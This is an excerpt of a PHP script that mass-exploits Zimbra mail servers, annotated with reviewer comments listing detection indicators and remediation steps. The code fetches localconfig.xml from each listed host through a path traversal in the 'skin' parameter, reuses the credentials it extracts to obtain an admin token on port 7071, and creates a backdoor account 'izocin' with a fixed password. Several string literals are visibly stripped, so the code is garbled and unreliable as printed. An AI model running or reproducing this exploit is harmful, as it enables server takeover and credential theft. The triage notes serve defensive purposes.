$toket$req"; return $body; }
// ^ Tail of a helper whose beginning lies outside this excerpt; kept exactly as found.

// NOTE(review): This is PHP, not Perl. The text was collapsed onto two lines and
// markup inside several string literals appears to have been stripped during
// extraction (see the empty explode() delimiters and the bare "$user[1]$pwd[1]"
// bodies below). The code is left token-for-token as found; only line breaks and
// comments are added.
//
// What the visible code does, read from a defender's point of view:
//   1. Reads a host list from the file named in $argv[1].
//   2. For each host, requests a Zimbra resource URL whose "skin" parameter
//      climbs out of the web root with "../" segments and ends in
//      /opt/zimbra/conf/localconfig.xml followed by a %00 byte.
//   3. Tries to pull two values out of the response and, if either is present,
//      talks to the admin SOAP endpoint on port 7071 and then creates an account
//      with a fixed name and password.
//
// Artefacts visible on this page that are useful for detection and triage:
//   - web access log entries for "res/I18nMsg,AjxMsg,...js.zgz" where the skin
//     parameter contains "../" sequences, "localconfig.xml" and "%00";
//   - the fixed User-Agent string set on the cURL handle below;
//   - requests to ":7071/service/admin/soap" from unexpected sources;
//   - a mailbox account whose local part is "izocin".
// If any of these are found, treat every secret stored in localconfig.xml as
// disclosed and rotate it, review the account list and admin audit log for
// accounts you did not create, keep port 7071 unreachable from untrusted
// networks, and apply the vendor's fix for the skin-parameter traversal.

// Usage guard: aborts when no list file is given on the command line.
if(!$argv[1]){ die("usage $argv[0] list.txt "); }

// Read the list; '@' suppresses any read error, so a missing file is not reported.
$getlist=@file_get_contents($argv[1]);
// Entries are split on CRLF only.
$ex=explode("\r\n",$getlist);
echo "\n\t Total sites : ".count($ex)."\n";

foreach($ex as $izo){
    // $array is assigned but never read in the visible code.
    $array = array();
    // Strip scheme / "www." / ":" substrings so only a bare host string remains.
    $int = array('https://www.','http://',':','www.','https');
    $replace = str_replace($int, "", $izo);
    // substr(..., 0) returns the whole string, so this is just a copy.
    $maw = substr($replace,0);
    $target = $maw;

    // Fixed credentials for the account created later; the same literal is used
    // for both, which makes the account name a usable indicator of compromise.
    $user_baru = "izocin";
    $pwd_baru = "izocin";

    // Request path carrying the traversal in the "skin" parameter (see summary above).
    $lfi = "res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00";
    $link_lfi = "$target/$lfi";
    echo "# scanning --->$target\n";

    // cURL handle: follows redirects, sends a fixed browser User-Agent, accepts
    // gzip, and disables TLS peer and host verification, so certificate problems
    // on the remote side are ignored. Cookies are kept in a file named
    // 'coker_log' in the working directory.
    $ch2 = curl_init ("$link_lfi");
    curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
    curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt ($ch2, CURLOPT_ENCODING, "gzip");
    curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
    curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
    $ambil = curl_exec ($ch2);

    // NOTE(review): both explode() calls have an empty delimiter as printed here;
    // the original delimiters look to have been lost in extraction, so which
    // fields of the response were being isolated cannot be told from this page.
    // The regex captures whatever sits between 'a["' and '</value>'.
    $get_user = explode('', $ambil);
    preg_match('/a\["(.*?)<\/value>/', $get_user[1], $user);
    $get_pwd = explode('', $ambil);
    preg_match('/a\["(.*?)<\/value>/', $get_pwd[1], $pwd);

    // '!=' binds tighter than 'or': this is ($user[1]) or ($pwd[1] != ""),
    // i.e. the branch is taken when either capture is non-empty.
    if($user[1] or $pwd[1] != ""){
        // Status text is not English ("Deneniyor" reads as Turkish for "trying").
        echo "# Deneniyor...\n";
        // Request body built from the two captured values (surrounding markup
        // appears stripped in this copy).
        $body = " $user[1]$pwd[1]";
        // Admin SOAP endpoint on port 7071 of the same host.
        $link = "https://$target:7071/service/admin/soap";
        // ngecek() is defined outside this excerpt; presumably it sends $body to
        // $link and returns the response -- confirm against its definition.
        $token = ngecek($link,$body);
        // Capture the text preceding '</authToken>' in the response.
        preg_match('/(.*)<\/authToken>/', $token, $toket);
        // No token captured: report and move on to the next host.
        if($toket[1]==""){ echo "# token cekilemedi\n\n"; }
        else{
            echo "#token: $toket[1]\n";
            // Empty request as printed (content likely stripped in extraction).
            $req = @("");
            // nganu_body() is the helper whose tail opens this excerpt; from that
            // tail it returns a body built from the token and the request text.
            $body2 = nganu_body($toket[1],$req);
            $liat = ngecek($link,$body2);
            // Capture used below as the mail domain for the new account.
            preg_match('/(.*?)<\/a>/', $liat, $domain);
            echo "# Creating Account...\n";
            // Account-creation request: fixed name at the captured domain plus
            // the fixed password.
            $req2 = "$user_baru@$domain[1]$pwd_baru";
            $body3 = nganu_body($toket[1],$req2);
            $liat2 = ngecek($link,$body3);
            // Capture the id of the account from the response.
            preg_match('/account id="(.*)" name="/', $liat2, $new);
            // Follow-up request on that account id carrying "TRUE"; presumably a
            // flag change on the account -- the attribute name is not visible here.
            $req3 = "$new[1]TRUE";
            $body4 = nganu_body($toket[1],$req3);
            $liat3 = ngecek($link,$body4);
            // "Success" is printed unconditionally; none of the responses above
            // are checked before this point.
            echo "# Success\n";
            echo "# Login Panel: https://$target:7071/zimbraAdmin/\n# Account: $user_baru@$domain[1]\n# Password: $pwd_baru\n\n";
        }
    }
    else{ echo "# not Vulnerable\n\n"; }
}
?>